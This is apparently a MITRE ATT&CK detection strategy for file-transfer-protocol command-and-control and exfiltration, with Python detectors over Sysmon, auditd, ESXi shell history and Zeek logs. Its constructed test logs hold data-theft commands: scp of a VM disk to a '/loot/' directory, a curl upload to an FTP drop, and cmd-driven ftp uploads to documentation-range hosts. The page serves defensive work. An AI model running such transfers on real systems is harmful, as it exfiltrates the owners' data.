Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)

ID: DET0416
Domains: Enterprise
Analytics: AN1169, AN1170, AN1171, AN1172, AN1173
Version: 1.0
Created: 21 October 2025
Last Modified: 21 October 2025

Analytics

AN1169

Detects FTP, SMB, or TFTP connections initiated by processes that are not normal file-transfer clients, such as PowerShell, cmd.exe, or rundll32.exe, especially when the connection carries a large outbound transfer or a byte ratio skewed heavily toward outbound. Sysmon EventCode 3 ties the connection to the originating process; EventCode 1 supplies the command line that launched it.

Log Sources
  Data Component                        | Name                | Channel
  Network Connection Creation (DC0082)  | WinEventLog:Sysmon  | EventCode=3
  Process Creation (DC0032)             | WinEventLog:Sysmon  | EventCode=1
  Network Traffic Content (DC0085)      | NSM:Flow            | ftp.log, smb_files.log

Mutable Elements
  Field                       | Description
  ProcessImageFilter          | Limit to non-standard FTP clients or suspicious binaries (e.g., cmd, mshta)
  DataFlowDirectionThreshold  | Ratio of outbound:inbound bytes; e.g., >90% outbound
  FilenamePattern             | Suspicious file extensions or naming (e.g., .zip, .rar, random hash names)
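The correlation AN1169 describes, written out as an added example (this is not MITRE's code or any vendor's rule): Sysmon EventCode 3 connections to FTP/FTPS/SMB/TFTP ports from a ProcessImageFilter set are joined back to their EventCode 1 command line via ProcessGuid, and enriched with a flow record to apply the DataFlowDirectionThreshold. The Sysmon events and the conn.log-style flow records are constructed samples; the port-to-protocol map, the suspicious-image set and the 90% ratio are the assumed tunables.

```python
"""Correlate Sysmon process and network events with flow records to flag
FTP/FTPS/SMB/TFTP connections started by processes that are not normal
file-transfer clients (AN1169). All events below are constructed samples."""

# Destination ports covered by this detection strategy (assumed mapping).
TRANSFER_PORTS = {21: "ftp", 990: "ftps", 445: "smb", 69: "tftp"}
# ProcessImageFilter: binaries that should not normally speak these protocols.
SUSPICIOUS_IMAGES = {"powershell.exe", "cmd.exe", "rundll32.exe", "mshta.exe"}
# DataFlowDirectionThreshold: share of bytes leaving the host (0.90 = 90% outbound).
OUTBOUND_RATIO = 0.90

# Constructed Sysmon events: EventCode 1 (process creation) and 3 (network connection).
SYSMON_EVENTS = [
    {"EventCode": 1, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c ftp -s:C:\Users\Public\up.txt 198.51.100.7"},
    {"EventCode": 1, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\WinSCP\WinSCP.exe",
     "CommandLine": "WinSCP.exe"},
    {"EventCode": 3, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\cmd.exe",
     "Initiated": "true", "SourceIp": "10.0.0.5",
     "DestinationIp": "198.51.100.7", "DestinationPort": 21},
    {"EventCode": 3, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\WinSCP\WinSCP.exe",
     "Initiated": "true", "SourceIp": "10.0.0.6",
     "DestinationIp": "10.0.0.50", "DestinationPort": 21},
    {"EventCode": 3, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\cmd.exe",
     "Initiated": "true", "SourceIp": "10.0.0.5",
     "DestinationIp": "198.51.100.7", "DestinationPort": 80},
]

# Constructed NSM flow records in Zeek conn.log style, aggregated per host pair and port.
CONN_LOG = [
    {"id.orig_h": "10.0.0.5", "id.resp_h": "198.51.100.7", "id.resp_p": 21,
     "service": "ftp", "orig_bytes": 52_000_000, "resp_bytes": 4_100},
    {"id.orig_h": "10.0.0.6", "id.resp_h": "10.0.0.50", "id.resp_p": 21,
     "service": "ftp", "orig_bytes": 2_000, "resp_bytes": 30_000_000},
]


def image_name(path):
    """Basename of a Windows image path, lower-cased for set membership."""
    return path.rsplit("\\", 1)[-1].lower()


def outbound_ratio(flow):
    """Fraction of bytes sent by the originator; 0.0 for an empty flow."""
    total = flow["orig_bytes"] + flow["resp_bytes"]
    return flow["orig_bytes"] / total if total else 0.0


def detect(events, flows, images=SUSPICIOUS_IMAGES, ratio=OUTBOUND_RATIO):
    """Return one alert per outbound transfer-protocol connection from a
    suspicious image, enriched with the launching command line and byte ratio."""
    created = {e["ProcessGuid"]: e for e in events if e["EventCode"] == 1}
    flow_idx = {(f["id.orig_h"], f["id.resp_h"], f["id.resp_p"]): f for f in flows}
    alerts = []
    for e in events:
        if e["EventCode"] != 3 or e.get("Initiated") != "true":
            continue  # only connections this host opened
        proto = TRANSFER_PORTS.get(e["DestinationPort"])
        if proto is None or image_name(e["Image"]) not in images:
            continue
        flow = flow_idx.get((e["SourceIp"], e["DestinationIp"], e["DestinationPort"]))
        seen = outbound_ratio(flow) if flow else None
        alerts.append({
            "protocol": proto,
            "image": image_name(e["Image"]),
            # EventCode 1 may be absent if Sysmon started after the process did.
            "command_line": created.get(e["ProcessGuid"], {}).get("CommandLine"),
            "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
            "outbound_ratio": seen,
            "exfil_like": seen is not None and seen >= ratio,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SYSMON_EVENTS, CONN_LOG):
        print(alert)
```

Only the cmd.exe connection to port 21 is alerted: WinSCP is an expected client, and the cmd.exe connection to port 80 is outside the port map. Keying the flow join on (source, destination, port) mirrors how a SIEM would join Sysmon to conn.log; in practice the join also needs a time window, which the constructed data omits.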

AN1170

Detects use of FTP, SCP, or TFTP by non-interactive shells or automation scripts that transfer large data volumes to untrusted IPs.

Log Sources
  Data Component                    | Name            | Channel
  Process Creation (DC0032)         | auditd:SYSCALL  | execve
  Network Traffic Content (DC0085)  | NSM:Flow        | ftp.log, conn.log

Mutable Elements
  Field                    | Description
  TransferSizeThreshold    | Bytes sent in FTP upload or SCP push
  CommandLinePatternMatch  | e.g., scp -r /var/log/* or ftp upload scripts

AN1171

Detects Automator, AppleScript, or Terminal executing curl, lftp, or tftp to transfer binaries to untrusted IPs or over unusual ports.

Log Sources
  Data Component               | Name              | Channel
  Network Traffic Flow (DC0078) | macos:osquery     | socket_events
  Command Execution (DC0064)   | macos:unifiedlog  | log stream --predicate

Mutable Elements
  Field               | Description
  FilePathAccessed    | e.g., ~/Documents, ~/Library/logs/
  NetworkPortAnomaly  | Non-standard FTP/TFTP ports used (e.g., FTP over 443)

AN1172

Detects file movement or outbound TFTP/FTP transfers from an ESXi host initiated through shell commands or injected scripts, particularly from the scratch partition or /tmp.

Log Sources
  Data Component                    | Name        | Channel
  Command Execution (DC0064)        | esxi:shell  | /root/.ash_history
  Network Traffic Content (DC0085)  | NSM:Flow    | mirror/SPAN port

Mutable Elements
  Field                     | Description
  TransferTargetDomainOrIP  | Public IPs or domains not belonging to known ESXi mgmt infra
  SourceDirectoryFilter     | Monitor transfers from /tmp/, /etc/, /vmfs/volumes/
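AN1170 (auditd execve records on Linux) and AN1172 (ESXi shell history) both reduce to the same command-line check: a transfer tool invoked with a source under SourceDirectoryFilter or a destination outside TransferTargetDomainOrIP. The added example below serves both and is not MITRE's code. It rebuilds argv from auditd EXECVE lines (including auditd's hex-encoded arguments, which carry no quotes), tokenises .ash_history lines with shlex, and judges the destination against an assumed allowlist of management networks rather than a public/private test, because an attacker's drop box can sit on any range. The tool list, the trusted ranges, the mgmt.example.internal domain and every log line are constructed assumptions.

```python
"""Flag shell-driven file transfers (scp/sftp/ftp/lftp/tftp/curl) that move data
from sensitive directories or to hosts outside trusted management networks,
over auditd EXECVE records (AN1170) and ESXi shell history (AN1172).
All log lines below are constructed samples."""
import ipaddress
import re
import shlex
from urllib.parse import urlparse

TRANSFER_TOOLS = {"scp", "sftp", "ftp", "lftp", "tftp", "curl"}
# SourceDirectoryFilter: trees whose contents should not leave the host this way.
SENSITIVE_DIRS = ("/tmp/", "/etc/", "/vmfs/volumes/", "/var/log/")
# TransferTargetDomainOrIP: assumed management ranges/domain; anything else is untrusted.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
TRUSTED_DOMAINS = ("mgmt.example.internal",)

# auditd quotes plain arguments and hex-encodes (without quotes) any argument that
# contains a space, quote or control character.
AUDIT_ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

AUDITD_LINES = [
    'type=EXECVE msg=audit(1700000000.101:311): argc=4 a0="scp" a1="-r" a2="/var/log" a3="backup@10.20.30.40:/archive/"',
    'type=EXECVE msg=audit(1700000000.205:312): argc=4 a0="scp" a1="-r" a2="/var/log" a3="u@203.0.113.9:/incoming/"',
    'type=EXECVE msg=audit(1700000000.300:313): argc=2 a0="ls" a1="/var/log"',
    # a2 is the hex encoding of "/tmp/stage one"
    'type=EXECVE msg=audit(1700000000.400:314): argc=4 a0="curl" a1="-T" a2=2F746D702F7374616765206F6E65 a3="ftp://203.0.113.9/drop/"',
]
ESXI_HISTORY = [
    "esxcli vm process list",
    "scp /vmfs/volumes/datastore1/fileserver/fileserver-flat.vmdk root@203.0.113.9:/loot/",
    "tftp 10.20.30.5 -c put /etc/vmware/esx.conf",
]

def argv_from_execve(record):
    """Rebuild argv from one auditd EXECVE line, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in AUDIT_ARG.findall(record):
        args[int(idx)] = quoted if quoted else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def is_sensitive(path):
    return (path.rstrip("/") + "/").startswith(SENSITIVE_DIRS)

def target_host(argv):
    """Heuristic destination extraction for common transfer-tool syntaxes."""
    tool = argv[0].rsplit("/", 1)[-1]
    for arg in argv[1:]:
        if arg.startswith(("-", "/")) or " " in arg:
            continue  # option, local path, or quoted script body
        if "://" in arg:                                            # curl/lftp URL
            return urlparse(arg).hostname
        if tool in ("scp", "sftp") and "@" in arg and ":" in arg:  # user@host:path
            return arg.split("@", 1)[1].split(":", 1)[0]
        if tool in ("ftp", "tftp", "lftp"):                         # bare host argument
            return arg
    return None

def host_trusted(host):
    if host is None:
        return True  # no destination recovered; judge on source paths only
    try:
        return any(ipaddress.ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:
        return host.endswith(TRUSTED_DOMAINS)

def evaluate(argv, origin):
    """Alert dict if argv is a transfer tool touching sensitive paths or an
    untrusted destination, else None."""
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    if tool not in TRANSFER_TOOLS:
        return None
    sensitive = [a for a in argv[1:] if is_sensitive(a)]
    host = target_host(argv)
    untrusted = not host_trusted(host)
    if not sensitive and not untrusted:
        return None
    return {"origin": origin, "tool": tool, "target": host,
            "sensitive_paths": sensitive, "untrusted_target": untrusted}

def scan_auditd(lines):
    execve = (argv_from_execve(l) for l in lines if "type=EXECVE" in l)
    return [a for a in (evaluate(argv, "auditd") for argv in execve) if a]

def scan_history(lines):
    alerts = []
    for line in lines:
        try:
            argv = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes in history; skip rather than crash
        alert = evaluate(argv, "esxi-shell")
        if alert:
            alerts.append(alert)
    return alerts
```

Run scan_auditd(AUDITD_LINES) and scan_history(ESXI_HISTORY) to see the three auditd alerts (two scp pushes of /var/log, one curl upload of a staged file with a space in its name) and the two ESXi alerts. The tftp line is flagged on its /etc/ source even though the destination is a trusted management host; that is deliberate, since a compromised host in trusted space is the usual staging point, and the untrusted_target field lets the consumer rank the two cases differently. The TransferSizeThreshold half of AN1170 needs the conn.log byte counts and is the same join shown for AN1169.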

AN1173

Detects internal hosts generating large outbound FTP/TFTP/SMB sessions to external IPs, and file transfers where the application-layer protocol does not match the port in use (e.g., FTP on port 80).

Log Sources
  Data Component                    | Name      | Channel
  Network Traffic Content (DC0085)  | NSM:Flow  | ftp.log, conn.log, smb_files.log

Mutable Elements
  Field                      | Description
  AppLayerProtocolMatch      | e.g., FTP/SMB observed over uncommon ports
  OutboundDataRateThreshold  | Bytes transferred outside trusted subnets >100 MB
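The two AN1173 checks run over Zeek conn.log, as an added example that is not MITRE's code or a Zeek package: the parser reads the #fields header so column order is not hard-coded, AppLayerProtocolMatch compares Zeek's service label (which can be a comma-separated list such as smb,ntlm) against the ports that service is expected on, and OutboundDataRateThreshold sums orig_bytes per internal host toward addresses outside trusted subnets. The log excerpt is constructed; the expected-port table (tftp in particular, which base Zeek does not label), the RFC 1918 trusted ranges and the 100 MB threshold are assumptions to tune per environment.

```python
"""Parse Zeek conn.log records and flag (a) an application-layer protocol seen on
an unexpected port and (b) hosts whose outbound bytes to addresses outside
trusted subnets exceed a threshold (AN1173). The log excerpt is constructed."""
import ipaddress
from collections import defaultdict

# AppLayerProtocolMatch: Zeek service labels and the ports they are expected on.
# ftp and smb are Zeek's own labels; tftp is assumed (it needs an extra analyzer).
EXPECTED_PORTS = {"ftp": {21}, "ftp-data": {20}, "smb": {139, 445}, "tftp": {69}}
# OutboundDataRateThreshold: bytes from one internal host to untrusted address space.
OUTBOUND_THRESHOLD = 100 * 1024 * 1024
# Trusted subnets: RFC 1918 here; replace with the environment's own ranges.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
          "proto", "service", "duration", "orig_bytes", "resp_bytes", "conn_state"]
ROWS = [
    ("1700000000.10", "C1", "10.0.0.5", "51000", "203.0.113.20", "80", "tcp", "ftp", "120.0", "61000000", "2000", "SF"),
    ("1700000001.10", "C2", "10.0.0.5", "51001", "203.0.113.20", "8443", "tcp", "smb,ntlm", "30.0", "52000000", "9000", "SF"),
    ("1700000002.10", "C3", "10.0.0.9", "51002", "10.0.0.50", "21", "tcp", "ftp", "5.0", "1200", "8000", "SF"),
    ("1700000003.10", "C4", "10.0.0.9", "51003", "203.0.113.30", "21", "tcp", "ftp", "3.0", "-", "500", "S1"),
]
# Constructed conn.log text in Zeek's tab-separated ASCII format.
SAMPLE_CONN_LOG = "\n".join(
    ["#separator \\x09", "#fields\t" + "\t".join(FIELDS)]
    + ["\t".join(r) for r in ROWS]
    + ["#close\t2023-11-14-22-13-20"])


def parse_conn_log(text):
    """One dict per record, named from the #fields header. Unset values ('-')
    become None; ports and byte counts become ints."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other header/footer lines
        else:
            rec = dict(zip(fields, line.split("\t")))
            for k in ("id.orig_p", "id.resp_p", "orig_bytes", "resp_bytes"):
                rec[k] = None if rec[k] == "-" else int(rec[k])
            records.append(rec)
    return records


def service_mismatches(rec):
    """Services in this record that Zeek saw on a port other than the expected one."""
    if rec["service"] in (None, "-"):
        return []
    return [s for s in rec["service"].split(",")
            if s in EXPECTED_PORTS and rec["id.resp_p"] not in EXPECTED_PORTS[s]]


def is_trusted(ip):
    return any(ipaddress.ip_address(ip) in net for net in TRUSTED_NETS)


def detect(text, threshold=OUTBOUND_THRESHOLD):
    """Return protocol/port mismatches and internal hosts over the outbound threshold."""
    mismatches, outbound = [], defaultdict(int)
    for rec in parse_conn_log(text):
        bad = service_mismatches(rec)
        if bad:
            mismatches.append({"uid": rec["uid"], "services": bad,
                               "port": rec["id.resp_p"], "dest": rec["id.resp_h"]})
        if is_trusted(rec["id.orig_h"]) and not is_trusted(rec["id.resp_h"]):
            outbound[rec["id.orig_h"]] += rec["orig_bytes"] or 0
    heavy = {h: b for h, b in outbound.items() if b > threshold}
    return {"mismatches": mismatches, "heavy_senders": heavy}


if __name__ == "__main__":
    print(detect(SAMPLE_CONN_LOG))
```

On the constructed excerpt C1 (ftp on 80) and C2 (smb on 8443) are reported as mismatches, and 10.0.0.5 is reported as a heavy sender with 113,000,000 bytes to TEST-NET space; C3 is an internal FTP session and stays quiet, and C4's unset orig_bytes is treated as zero rather than crashing the aggregation. In production the aggregation window matters: per-day sums catch slow drips that a per-connection threshold misses.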